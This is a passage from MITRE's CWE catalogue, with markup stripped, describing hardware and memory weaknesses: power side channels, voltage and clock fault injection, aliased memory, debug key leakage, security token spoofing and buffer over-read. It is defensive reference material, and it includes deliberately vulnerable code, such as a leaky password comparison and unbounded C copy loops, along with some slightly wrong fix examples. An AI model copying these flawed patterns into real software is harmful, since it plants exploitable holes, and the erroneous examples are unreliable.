ability to implement an attack, however, consideration must be given to the physical removal of the filter elements. - - - Integration - During integration, avoid use of a single secret for an extended period (e.g. frequent key updates). This limits the amount of data compromised but at the cost of complexity of use. - - - - - Consider an example hardware module that checks a user-provided password (or PIN) to grant access to a user. The user-provided password is compared against a stored value byte-by-byte. - - static nonvolatile password_tries = NUM_RETRIES; - do -   while (password_tries == 0) ; // Hang here if no more password tries -   password_ok = 0; -   for (i = 0; i < NUM_PW_DIGITS; i++) -     if (GetPasswordByte() == stored_password([i]) -       password_ok |= 1; // Power consumption is different here -     else -       password_ok |= 0; // than from here -   end -   if (password_ok > 0) -     password_tries = NUM_RETRIES; -     break_to_Ok_to_proceed -   password_tries--; - while (true) - // Password OK - - Since the algorithm uses a different number of 1's and 0's for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes. - - - Among various options for mitigating the string comparison is obscuring the power comsumption by having opposing bit flips during bit operations. Note that in this example, the initial change of the bit values could still provide power indication depending upon the hardware itself. This possibility needs to be measured for verification. - static nonvolatile password_tries = NUM_RETRIES; - do -   while (password_tries == 0) ; // Hang here if no more password tries -   password_tries--; // Put retry code here to catch partial retries -   password_ok = 0; -   for (i = 0; i < NUM_PW_DIGITS; i++) -     if (GetPasswordByte() == stored_password([i]) -       password_ok |= 0x10; // Power consumption here -     else -       password_ok |= 0x01; // is now the same here -   end -   if ((password_ok & 1) == 0) -     password_tries = NUM_RETRIES; -     break_to_Ok_to_proceed - while (true) - // Password OK - - Since the algorithm uses a different number of 1's and 0's for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes. - - An alternative to the previous example is simply comparing the whole password simultaneously. - - static nonvolatile password_tries = NUM_RETRIES; - do -   while (password_tries == 0) ; // Hang here if no more password tries -   password_tries--; // Put retry code here to catch partial retries -   for (i = 0; i < NUM_PW_DIGITS; i++) -     stored_password([i] = GetPasswordByte(); -   end -   if (stored_password == saved_password) -     password_tries = NUM_RETRIES; -     break_to_Ok_to_proceed - while (true) - // Password OK - - Since comparison is done atomically, there is no indication which bytes fail forcing the attacker to brute force the whole password at once. Note that other mitigations may exist such as masking - causing a large current draw to mask individual bit flips. - - - This code demonstrates the transfer of a secret key using Serial-In/Serial-Out shift. It's easy to extract the secret using simple power analysis as each shift gives data on a single bit of the key. - - module siso(clk,rst,a,q); - input a; - input clk,rst; - output q; - reg q; - - always@(posedge clk,posedge rst) - begin - if(rst==1'b1) - q<1'b0; - else - q<a; - end - endmodule - - This code demonstrates the transfer of a secret key using a Parallel-In/Parallel-Out shift. In a parallel shift, data confounded by multiple bits of the key, not just one. - - module pipo(clk,rst,a,q); - input clk,rst; - input[3:0]a; - output[3:0]q; - reg[3:0]q; - - always@(posedge clk,posedge rst) - begin - if (rst==1'b1) - q<4'b0000; - else - q<a; - end - endmodule - - - - - - CVE-2020-12788 - CMAC verification vulnerable to timing and power attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12788 - - - - Power - - - - - - - - - - CWE Content Team - MITRE - 2020-05-29 - - - CWE Content Team - MITRE - 2021-03-15 - updated Functional_Areas, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns - - - Accellera IP Security Assurance (IPSA) Working Group - Accellera Systems Initiative - 2020-09-09 - Submitted new material that could be added to already-existing entry CWE-1255. Added new Potential Mitigations, a new example, an observed example, and an additional reference. - - - - - - - The product provides software-controllable - device functionality for capabilities such as power and - clock management, but it does not properly limit - functionality that can lead to modification of - hardware memory or register bits, or the ability to - observe physical side channels. - - It is frequently assumed that physical attacks - such as fault injection and side-channel analysis - require an attacker to have physical access to the - target device. This assumption may be false if the - device has improperly secured power management features, - or similar features. For mobile devices, minimizing - power consumption is critical, but these devices run a - wide variety of applications with different performance - requirements. Software-controllable mechanisms to - dynamically scale device voltage and frequency and - monitor power consumption are common features in today's - chipsets, but they also enable attackers to mount fault - injection and side-channel attacks without having - physical access to the device. - - Fault injection attacks involve strategic - manipulation of bits in a device to achieve a desired - effect such as skipping an authentication step, - elevating privileges, or altering the output of a - cryptographic operation. Manipulation of the device - clock and voltage supply is a well-known technique to - inject faults and is cheap to implement with physical - device access. Poorly protected power management - features allow these attacks to be performed from - software. Other features, such as the ability to write - repeatedly to DRAM at a rapid rate from unprivileged - software, can result in bit flips in other memory - locations (Rowhammer, [REF-1083]). - - Side channel analysis requires gathering - measurement traces of physical quantities such as power - consumption. Modern processors often include power - metering capabilities in the hardware itself (e.g., - Intel RAPL) which if not adequately protected enable - attackers to gather measurements necessary for - performing side-channel attacks from software. - - - - - - - Primary - - - - - - - - - - - - - - Architecture and Design - An architect may initiate introduction of - this weakness via exacting requirements for - software accessible power/clock management - requirements - - - Implementation - An implementer may introduce this weakness - by assuming there are no consequences to unbounded - power and clock management for secure components - from untrusted ones. - - - - - Integrity - Modify Memory - Modify Application Data - Bypass Protection Mechanism - - - - - Manual Analysis - Perform a security evaluation of system-level - architecture and design with software-aided physical attacks - in scope. - - - Automated Dynamic Analysis - - Use custom software to change registers that control clock settings or power settings to try to bypass security locks, or repeatedly write DRAM to try to change adjacent locations. This can be effective in extracting or changing data. The drawback is that it cannot be run before manufacturing, and it may require specialized software. - - Moderate - - - - - Architecture and Design - Implementation - - Ensure proper access control mechanisms protect software-controllable features altering physical operating conditions such as clock frequency and voltage. - - - - - - This example considers the Rowhammer problem [REF-1083]. The Rowhammer issue was caused by a program in a tight loop writing repeatedly to a location to which the program was allowed to write but causing an adjacent memory location value to change. - - Continuously writing the same value to the same address causes the value of an adjacent location to change value. - - Preventing the loop required to defeat the Rowhammer exploit is not always possible: - - Redesign the RAM devices to reduce inter capacitive coupling making the Rowhammer exploit impossible. - - While the redesign may be possible for new devices, a redesign is not possible in existing devices. There is also the possibility that reducing capacitance with a relayout would impact the density of the device resulting in a less capable, more costly device. - - - Suppose a hardware design implements a set of software-accessible registers for scaling clock frequency and voltage but does not control access to these registers. Attackers may cause register and memory changes and race conditions by changing the clock or voltage of the device under their control. - - - Consider the following SoC - design. Security-critical settings for scaling clock - frequency and voltage are available in a range of - registers bounded by [PRIV_END_ADDR : PRIV_START_ADDR] - in the tmcu.csr module in the HW Root of Trust. These - values are writable based on the lock_bit register in - the same module. The lock_bit is only writable by - privileged software running on the tmcu. - - - - We assume that untrusted software running on any of the - Core{0-N} processors has access to the input and output - ports of the hrot_iface. If untrusted software can clear - the lock_bit or write the clock frequency and voltage - registers due to inadequate protection, a fault - injection attack could be performed. - - - - - - CVE-2019-11157 - Plundervolt: Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access [REF-1081]. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11157 - - - CVE-2020-8694 - PLATYPUS Attack: Insufficient access control in the Linux kernel driver for some Intel processors allows information disclosure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8694 - - - CVE-2020-8695 - Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695 - - - CVE-2020-12912 - AMD extension to a Linux service does not require privileged access to the RAPL interface, allowing side-channel attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12912 - - - CVE-2015-0565 - NaCl in 2015 allowed the CLFLUSH instruction, making Rowhammer attacks possible. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0565 - - - - Power - Clock - - - - - - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-05-08 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Maintenance_Notes, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Functional_Areas, Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Observed_Examples - - - Tortuga Logic - 2021-07-16 - Provided Demonstrative Example for Hardware Root of Trust - - - Anders Nordstrom, Alric Althoff - Tortuga Logic - 2021-10-11 - Provided detection method - - - Nicole Fern - Riscure - 2021-10-15 - updated description and extended description, detection method, and observed examples - - - - - Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region. - - - Hardware product designs often need to implement memory protection features that enable privileged software to define isolated memory regions and access control (read/write) policies. Isolated memory regions can be defined on different memory spaces in a design (e.g. system physical address, virtual address, memory mapped IO). - Each memory cell should be mapped and assigned a system address that the core software can use to read/write to that memory. It is possible to map the same memory cell to multiple system addresses such that read/write to any of the aliased system addresses would be decoded to the same memory cell. - This is commonly done in hardware designs for redundancy and simplifying address decoding logic. If one of the memory regions is corrupted or faulty, then that hardware can switch to using the data in the mirrored memory region. Memory aliases can also be created in the system address map if the address decoder unit ignores higher order address bits when mapping a smaller address region into the full system address. - A common security weakness that can exist in such memory mapping is that aliased memory regions could have different read/write access protections enforced by the hardware such that an untrusted agent is blocked from accessing a memory address but is not blocked from accessing the corresponding aliased memory address. Such inconsistency can then be used to bypass the access protection of the primary memory block and read or modify the protected memory. - An untrusted agent could also possibly create memory aliases in the system address map for malicious purposes if it is able to change the mapping of an address region or modify memory region sizes. - - - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Memory - High - - - Integrity - Modify Memory - High - - - Availability - DoS: Instability - High - - - - - Architecture and Design - Implementation - The checks should be applied for consistency access rights between primary memory regions and any mirrored or aliased memory regions. If different memory protection units (MPU) are protecting the aliased regions, their protected range definitions and policies should be synchronized. - - - Architecture and Design - Implementation - The controls that allow enabling memory aliases or changing the size of mapped memory regions should only be programmable by trusted software components. - - - - - - In a System-on-a-Chip (SoC) design the system fabric uses 16 bit addresses. An IP unit (Unit_A) has 4 kilobyte of internal memory which is mapped into a 16 kilobyte address range in the system fabric address map. - - - - System Address - - - Mapped to - - - - - 0x0000 – 0x3FFF - - - Unit_A registers : 0x0000 – 0x0FFF - - - - - 0x4000 – 0xFFFF - - - Other IPs & Memory - - - - - To protect the register controls in Unit_A unprivileged software is blocked from accessing addresses between 0x0000 – 0x0FFF. - - - The address decoder of Unit_A masks off the higher order address bits and decodes only the lower 12 bits for computing the offset into the 4 kilobyte internal memory space. - - - - In this design the aliased memory address ranges are these: - - 0x0000 – 0x0FFF - 0x1000 – 0x1FFF - 0x2000 – 0x2FFF - 0x3000 – 0x3FFF - - The same register can be accessed using four different addresses: 0x0000, 0x1000, 0x2000, 0x3000. - - - The system address filter only blocks access to range 0x0000 - 0x0FFF and does not block access to the aliased addresses in 0x1000 - 0x3FFF range. Thus, untrusted software can leverage the aliased memory addresses to bypass the memory protection. - - - - - In this design the aliased memory addresses (0x1000 - 0x3FFF) could be blocked from all system software access since they are not used by software. - - - Alternately, the MPU logic can be changed to apply the memory protection policies to the full address range mapped to Unit_A (0x0000 - 0x3FFF). - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-04-29 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns - - - - - The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered. - - Security sensitive values, keys, intermediate steps of cryptographic operations, etc. are stored in temporary registers in the hardware. If these values are not cleared when debug mode is entered they may be accessed by a debugger allowing sensitive information to be accessible by untrusted parties. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Memory - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - - Whenever debug mode is enabled, all registers containing sensitive assets must be cleared. - - - - - - A cryptographic core in a System-On-a-Chip (SoC) is used for cryptographic acceleration and implements several cryptographic operations (e.g., computation of AES encryption and decryption, SHA-256, HMAC, etc.). The keys for these operations or the intermediate values are stored in registers internal to the cryptographic core. These internal registers are in the Memory Mapped Input Output (MMIO) space and are blocked from access by software and other untrusted agents on the SoC. These registers are accessible through the debug and test interface. - - In the above scenario, registers that store keys and intermediate values of cryptographic operations are not cleared when system enters debug mode. An untrusted actor running a debugger may read the contents of these registers and gain access to secret keys and other sensitive cryptographic information. - - Whenever the chip enters debug mode, all registers containing security-sensitive data are be cleared rendering them unreadable. - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns, Relationships - - Sensitive Information Uncleared During Hardware Debug Flows - - - - The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected. - Systems-On-A-Chip (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify which actions originated from which agent. These actions may be one of the directives: 'read', 'write', 'program', 'reset', 'fetch', 'compute', etc. Security Tokens are assigned to every agent in the System that is capable of generating an action or receiving an action from another agent. Multiple Security Tokens may be assigned to an agent and may be unique based on the agent's trust level or allowed privileges. Since the Security Tokens are integral for the maintenence of security in an SoC, they need to be protected properly. A common weakness afflicting Security Tokens is improperly restricting the assignment to trusted components. Consequently, an improperly protected Security Token may be able to be programmed by a malicious agent (i.e., the Security Token is mutable) to spoof the action as if it originated from a trusted agent. - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Files or Directories - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Modify Memory - Modify Memory - DoS: Crash, Exit, or Restart - High - - - - - Architecture and Design - Implementation - - - Security Token assignment review checks for design inconsistency and common weaknesses. - Security-Token definition and programming flow is tested in both pre-silicon and post-silicon testing. - - - - - - - For example, consider a system with a register for storing an AES key for encryption and decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key register assets have an associated control register, AES_KEY_ACCESS_POLICY, which provides the necessary access controls. This access-policy register defines which agents may engage in a transaction, and the type of transaction, with the AES-key registers. Each bit in this 32-bit register defines a security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., “1”) allows respective action from an agent whose identity matches the number of the bit and, if “0” (i.e., Clear), disallows the respective action to that corresponding agent. - - - Let’s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are “1” and “2”. - - - - Register - Description - Default - - - AES_ENC_DEC_KEY_0 - AES key [0:31] for encryption or decryption - 0x00000000 - - - AES_ENC_DEC_KEY_1 - AES key [32:63] for encryption or decryption - 0x00000000 - - - AES_ENC_DEC_KEY_2 - AES key [64:95] for encryption or decryption - 0x00000000 - - - AES_ENC_DEC_KEY_3 - AES key [96:127] for encryption or decryption - 0x00000000 - - - AES_KEY_ACCESS_POLICY - AES key access register [31:0] - 0x00000002 - - - - - An agent with Security Token “1” has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is “1”. - - The Aux-controller could program its Security Token to “1” from “2”. - The SoC does not properly protect the Security Token of the agents, and, hence, the Aux-controller in the above example can spoof the transaction (i.e., send the transaction as if it is coming from the Main-controller to access the AES-Key registers) - The SoC needs to protect the Security Tokens. None of the agents in the SoC should have the ability to change the Security Token. - - - - - - - - This entry is still under development and will continue to see updates and content improvements. Currently it is expressed as a general absence of a protection mechanism as opposed to a specific mistake, and the entry's name and description could be interpreted as applying to software. - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-03-06 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Improper Protection of Security Identifiers - - - - The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer. - This typically occurs when the pointer or its index is incremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in exposure of sensitive information or possibly a crash. - - - - - - - Primary - - - - - - - - - Implementation - - - - - Confidentiality - Read Memory - - - Confidentiality - Bypass Protection Mechanism - By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service. - - - - - In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. - - int processMessageFromSocket(int socket) { - int success; - char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; - - // get message from socket and store into buffer - - - //Ignoring possibliity that buffer > BUFFER_SIZE - if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { - - - // place contents of the buffer into message structure - ExMessage *msg = recastBuffer(buffer); - - // copy message body into string for processing - int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; - - // process message - success = processMessage(message); - }return success; - } - - However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). - - - The following C/C++ example demonstrates a buffer over-read due to a missing NULL terminator. The main method of a pattern matching utility that looks for a specific pattern within a specific file uses the string strncopy() method to copy the command line user input file name and pattern to the Filename and Pattern character arrays respectively. - - int main(int argc, char **argv){ - char Filename[256];char Pattern[32]; - - /* Validate number of parameters and ensure valid content */ - ... - - /* copy filename parameter to variable, may cause off-by-one overflow */ - strncpy(Filename, argv[1], sizeof(Filename)); - - /* copy pattern parameter to variable, may cause off-by-one overflow */ - strncpy(Pattern, argv[2], sizeof(Pattern)); - printf("Searching file: %s for the pattern: %s\n", Filename, Pattern);Scan_File(Filename, Pattern);} - - However, the code do not take into account that strncpy() will not add a NULL terminator when the source buffer is equal in length of longer than that provide size attribute. Therefore if a user enters a filename or pattern that are the same size as (or larger than) their respective character arrays, a NULL terminator will not be added (CWE-170) which leads to the printf() read beyond the expected end of the Filename and Pattern buffers. - To fix this problem, be sure to subtract 1 from the sizeof() call to allow room for the null byte to be added. - - - /* copy filename parameter to variable, no off-by-one overflow */ - strncpy(Filename, argv[2], sizeof(Filename)-1);Filename[255]='\0'; - - /* copy pattern parameter to variable, no off-by-one overflow */ - strncpy(Pattern, argv[3], sizeof(Pattern)-1);Pattern[31]='\0'; - - - - - - CVE-2014-0160 - Chain: "Heartbleed" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 - - - CVE-2009-2523 - Chain: product does not handle when an input string is not NULL terminated, leading to buffer over-read or heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523 - - - - - Buffer over-read - - - SFP8 - Faulty Buffer Access - - - - - - - - - These problems may be resultant from missing sentinel values (CWE-463) or trusting a user-influenced input length variable. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples - - - CWE Content Team - MITRE - 2018-03-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-09-19 - updated Common_Consequences, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - - - The product allows address regions to overlap, which can result in the bypassing of intended memory protection. - - Isolated memory regions and access control (read/write) policies are used by hardware to protect privileged software. Software components are often allowed to change or remap memory region definitions in order to enable flexible and dynamically changeable memory management by system software. - If a software component running at lower privilege can program a memory address region to overlap with other memory regions used by software running at higher privilege, privilege escalation may be available to attackers. The memory protection unit (MPU) logic can incorrectly handle such an address overlap and allow the lower-privilege software to read or write into the protected memory region, resulting in privilege escalation attack. An address overlap weakness can also be used to launch a denial of service attack on the higher-privilege software memory regions. - - - - - - - - Primary - - - Resultant - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design or implementation and identified later during the Testing phase. - - - Implementation - - - - - Confidentiality - Integrity - Availability - Modify Memory - Read Memory - DoS: Instability - High - - - - - Manual Analysis - Create a high privilege memory block of any arbitrary size. Attempt to create a lower privilege memory block with an overlap of the high privilege memory block. If the creation attempt works, fix the hardware. Repeat the test. - High - - - - - Architecture and Design - - Ensure that memory regions are isolated as intended and that access control (read/write) policies are used by hardware to protect privileged software. - - - - Implementation - - For all of the programmable memory protection regions, the memory protection unit (MPU) design can define a priority scheme. - For example: if three memory regions can be programmed (Region_0, Region_1, and Region_2), the design can enforce a priority scheme, such that, if a system address is within multiple regions, then the region with the lowest ID takes priority and the access-control policy of that region will be applied. In some MPU designs, the priority scheme can also be programmed by trusted software. - Hardware logic or trusted firmware can also check for region definitions and block programming of memory regions with overlapping addresses. - The memory-access-control-check filter can also be designed to apply a policy filter to all of the overlapping ranges, i.e., if an address is within Region_0 and Region_1, then access to this address is only granted if both Region_0 and Region_1 policies allow the access. - - High - - - - - - For example, consider a design with a 16-bit address that has two software privilege levels: Privileged_SW and Non_privileged_SW. To isolate the system memory regions accessible by these two privilege levels, the design supports three memory regions: Region_0, Region_1, and Region_2. - Each region is defined by two 32 bit registers: its range and its access policy. - - Address_range[15:0]: specifies the Base address of the region - Address_range[31:16]: specifies the size of the region - Access_policy[31:0]: specifies what types of software can access a region and which actions are allowed - - Certain bits of the access policy are defined symbolically as follows: - - Access_policy.read_np: if set to one, allows reads from Non_privileged_SW - Access_policy.write_np: if set to one, allows writes from Non_privileged_SW - Access_policy.execute_np: if set to one, allows code execution by Non_privileged_SW - Access_policy.read_p: if set to one, allows reads from Privileged_SW - Access_policy.write_p: if set to one, allows writes from Privileged_SW - Access_policy.execute_p: if set to one, allows code execution by Privileged_SW - - For any requests from software, an address-protection filter checks the address range and access policies for each of the three regions, and only allows software access if all three filters allow access. - Consider the following goals for access control as intended by the designer: - - Region_0 & Region_1: registers are programmable by Privileged_SW - Region_2: registers are programmable by Non_privileged_SW - - The intention is that Non_privileged_SW cannot modify memory region and policies defined by Privileged_SW in Region_0 and Region_1. Thus, it cannot read or write the memory regions that Privileged_SW is using. - - - Non_privileged_SW can program the Address_range register for Region_2 so that its address overlaps with the ranges defined by Region_0 or Region_1. Using this capability, it is possible for Non_privileged_SW to block any memory region from being accessed by Privileged_SW, i.e., Region_0 and Region_1. - - This design could be improved in several ways. - Ensure that software accesses to memory regions are only permitted if all three filters permit access. Additionally, the scheme could define a memory region priority to ensure that Region_2 (the memory region defined by Non_privileged_SW) cannot overlap Region_0 or Region_1 (which are used by Privileged_SW). - - - - - CVE-2008-7096 - virtualization product allows compromise of hardware product by accessing certain remapping registers. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7096 - - - [REF-1100] - processor design flaw allows ring 0 code to access more privileged rings by causing a register window to overlap a range of protected system RAM [REF-1100] - https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf - - - - - - - - - - As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-10 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-12-10 - updated Maintenance_Notes - - - Narasimha Kumar V Mangipudi - Lattice Semiconductor - 2021-10-20 - suggested content improvements - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - suggested observed examples - - - - - The hardware logic does not effectively handle when single-event upsets (SEUs) occur. - - Technology trends such as CMOS-transistor down-sizing, use of - new materials, and system-on-chip architectures continue to increase the - sensitivity of systems to soft errors. These errors are random, and - their causes might be internal (e.g., interconnect coupling) or external - (e.g., cosmic radiation). These soft errors are not permanent in nature - and cause temporary bit flips known as single-event upsets (SEUs). - SEUs are induced errors in circuits caused when charged particles lose - energy by ionizing the medium through which they pass, leaving behind a - wake of electron-hole pairs that cause temporary failures. If these - failures occur in security-sensitive modules in a chip, it might - compromise the security guarantees of the chip. For instance, these - temporary failures could be bit flips that change the privilege of - a regular user to root. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - Access Control - DoS: Crash, Exit, or Restart - DoS: Instability - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Architecture and Design - - Implement triple-modular redundancy around security-sensitive modules. - - - - Architecture and Design - - SEUs mostly affect SRAMs. For SRAMs storing security-critical data, implement Error-Correcting-Codes (ECC) and Address Interleaving. - - - - - - This is an example from [REF-1089]. See the reference for full details of this issue. - Parity is error detecting but not error correcting. - Due to single-event upsets, bits are flipped in memories. As a result, memory-parity checks fail, which results in restart and a temporary denial of service of two to three minutes. - Using error-correcting codes could have avoided the restart caused by SEUs. - - - In 2016, a security researcher, who was also a patient using a pacemaker, was on an airplane when a bit flip occurred in the pacemaker, likely due to the higher prevalence of cosmic radiation at such heights. The pacemaker was designed to account for bit flips and went into a default safe mode, which still forced the patient to go to a hospital to get it reset. The bit flip also inadvertently enabled the researcher to access the crash file, perform reverse engineering, and detect a hard-coded key. [REF-1101] - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - - - The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers. - - Software commonly accesses peripherals in a System-on-Chip (SoC) or other device through a memory-mapped register interface. Malicious software could tamper with any security-critical hardware data that is accessible directly or indirectly through the register interface, which could lead to a loss of confidentiality and integrity. - - - - - - - Primary - - - - - - - - - - - Architecture and Design - This weakness may be exploited if the register interface design does not adequately protect hardware assets from software. - - - Implementation - Mis-implementation of access control policies may inadvertently allow access to hardware assets through the register interface. - - - - - Confidentiality - Integrity - Read Memory - Read Application Data - Modify Memory - Modify Application Data - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Unexpected State - Alter Execution Logic - Confidentiality of hardware assets may be violated if the protected information can be read out by software through the register interface. Registers storing security state, settings, other security-critical data may be corruptible by software without correctly implemented protections. - - - - - Manual Analysis - This is applicable in the Architecture phase before implementation started. Make sure access policy is specified for the entire memory map. Manual analysis may not ensure the implementation is correct. - Moderate - - - Manual Analysis - Registers controlling hardware should have access control implemented. This access control may be checked manually for correct implementation. Items to check consist of how are trusted parties set, how are trusted parties verified, how are accesses verified, etc. Effectiveness of a manual analysis will vary depending upon how complicated the interface is constructed. - Moderate - - - Simulation / Emulation - Functional simulation is applicable during the Implementation Phase. Testcases must be created and executed for memory mapped registers to verify adherence to the access control policy. This method can be effective, since functional verification needs to be performed on the design, and verification for this weakness will be included. There can be difficulty covering the entire memory space during the test. - Moderate - - - Formal Verification - Formal verification is applicable during the Implementation phase. Assertions need to be created in order to capture illegal register access scenarios and prove that they cannot occur. Formal methods are exhaustive and can be very effective, but creating the cases for large designs may be complex and difficult. - High - - - Automated Analysis - Information flow tracking can be applicable during the Implementation phase. Security sensitive data (assets) - for example, as stored in registers - is automatically tracked over time through the design to verify the data doesn't reach illegal destinations that violate the access policies for the memory map. This method can be very effective when used together with simulation and emulation, since detecting violations doesn't rely on specific scenarios or data values. This method does rely on simulation and emulation, so testcases must exist in order to use this method. - High - - - Architecture or Design Review - Manual documentation review of the system memory map, register specification, and permissions associated with accessing security-relevant functionality exposed via memory-mapped registers. - Moderate - - - Fuzzing - Perform penetration testing (either manual or semi-automated with fuzzing) to verify that access control mechanisms such as the memory protection units or on-chip bus firewall settings adequately protect critical hardware registers from software access. - Moderate - - - - - Architecture and Design - Design proper policies for hardware register access from software. - - - Implementation - Ensure that access control policies for register access are implemented in accordance with the specified design. - - - - - The register interface provides software access to hardware functionality. This functionality is an attack surface. This attack surface may be used to run untrusted code on the system through the register interface. As an example, cryptographic accelerators require a mechanism for software to select modes of operation and to provide plaintext or ciphertext data to be encrypted or decrypted as well as other functions. This functionality is commonly provided through registers. - Cryptographic key material stored in registers inside the cryptographic accelerator can be accessed by software. - Key material stored in registers should never be accessible to software. Even if software can provide a key, all read-back paths to software should be disabled. - - - - - CVE-2014-2915 - virtualization product does not restrict access to debug and other processor registers in the hardware, allowing a crash of the host or guest OS - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2915 - - - CVE-2021-3011 - virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code - 